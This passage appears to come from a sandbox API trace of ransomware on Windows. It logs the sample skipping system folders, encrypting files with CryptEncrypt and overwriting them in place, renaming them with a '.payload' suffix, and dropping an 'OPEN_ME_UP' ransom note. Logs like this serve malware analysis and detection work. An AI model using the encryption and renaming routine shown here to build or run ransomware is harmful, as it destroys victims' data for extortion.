lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.518] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.518] GetTickCount () returned 0x114f500 [0059.518] GetTickCount () returned 0x114f500 [0059.518] GetTickCount () returned 0x114f500 [0059.518] GetTickCount () returned 0x114f500 [0059.518] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.518] GetProcessHeap () returned 0x5e0000 [0059.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.518] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xe63, lpOverlapped=0x0) returned 1 [0059.520] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff19d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.520] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xe63, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xe63, lpOverlapped=0x0) returned 1 [0059.520] GetProcessHeap () returned 0x5e0000 [0059.520] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.520] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.520] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.520] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.520] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.520] CloseHandle (hObject=0x438) returned 1 [0059.521] GetProcessHeap () returned 0x5e0000 [0059.521] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.521] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.523] GetProcessHeap () returned 0x5e0000 [0059.523] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.523] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.523] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.523] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.523] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.524] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.524] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.524] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 48 [0059.524] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.524] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.524] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.524] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.524] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.524] GetTickCount () returned 0x114f500 [0059.524] GetTickCount () returned 0x114f500 [0059.524] GetTickCount () returned 0x114f500 [0059.524] GetTickCount () returned 0x114f500 [0059.524] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.524] GetProcessHeap () returned 0x5e0000 [0059.524] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.524] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.526] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.526] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.526] GetProcessHeap () returned 0x5e0000 [0059.526] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.526] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.527] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.527] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.527] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.527] CloseHandle (hObject=0x438) returned 1 [0059.529] GetProcessHeap () returned 0x5e0000 [0059.529] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.529] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.530] GetProcessHeap () returned 0x5e0000 [0059.530] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.530] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.530] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 49 [0059.530] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.530] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.530] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.530] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.530] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.530] GetTickCount () returned 0x114f50f [0059.530] GetTickCount () returned 0x114f50f [0059.530] GetTickCount () returned 0x114f50f [0059.530] GetTickCount () returned 0x114f50f [0059.530] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.531] GetProcessHeap () returned 0x5e0000 [0059.531] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.531] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.532] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.532] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.533] GetProcessHeap () returned 0x5e0000 [0059.533] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.533] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.533] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.533] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.533] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.533] CloseHandle (hObject=0x438) returned 1 [0059.534] GetProcessHeap () returned 0x5e0000 [0059.534] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.534] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.535] GetProcessHeap () returned 0x5e0000 [0059.535] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.535] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.535] FindClose (in: hFindFile=0x6066e0 | out: hFindFile=0x6066e0) returned 1 [0059.535] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.535] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1046\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.535] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.536] CloseHandle (hObject=0x430) returned 1 [0059.536] GetProcessHeap () returned 0x5e0000 [0059.536] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.536] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1049", cAlternateFileName="")) returned 1 [0059.536] lstrcmpiW (lpString1="1049", lpString2="Windows") returned -1 [0059.536] lstrcmpiW (lpString1="1049", lpString2="$Recycle.bin") returned 1 [0059.536] lstrcmpiW (lpString1="1049", lpString2="System Volume Information") returned -1 [0059.536] lstrcmpiW (lpString1="1049", lpString2="Program Files") returned -1 [0059.536] lstrcmpiW (lpString1="1049", lpString2="Program Files (x86)") returned -1 [0059.536] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049") returned 30 [0059.536] lstrcmpW (lpString1="1049", lpString2=".") returned 1 [0059.537] lstrcmpW (lpString1="1049", lpString2="..") returned 1 [0059.537] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.537] GetProcessHeap () returned 0x5e0000 [0059.537] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.537] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\*") returned 32 [0059.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6064e0 [0059.537] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.537] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.537] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.537] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.537] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.537] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\.") returned 32 [0059.537] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.537] FindNextFileW (in: hFindFile=0x6064e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.537] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.537] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.537] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.537] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.537] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.537] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\..") returned 33 [0059.537] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.537] FindNextFileW (in: hFindFile=0x6064e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.537] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.537] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.537] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.537] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.537] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.537] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 39 [0059.537] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.538] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.538] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.538] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.538] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.637] GetTickCount () returned 0x114f57d [0059.637] GetTickCount () returned 0x114f57d [0059.637] GetTickCount () returned 0x114f57d [0059.637] GetTickCount () returned 0x114f57d [0059.637] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.637] GetProcessHeap () returned 0x5e0000 [0059.637] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.637] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.640] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.640] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.640] GetProcessHeap () returned 0x5e0000 [0059.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.640] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.640] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.640] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.640] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.640] CloseHandle (hObject=0x438) returned 1 [0059.642] GetProcessHeap () returned 0x5e0000 [0059.642] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.642] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.644] GetProcessHeap () returned 0x5e0000 [0059.644] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.644] FindNextFileW (in: hFindFile=0x6064e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.644] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.644] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.644] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.644] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.644] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.644] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 48 [0059.645] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.645] lstrcmpW (lpString1="LocalizedData.xml", 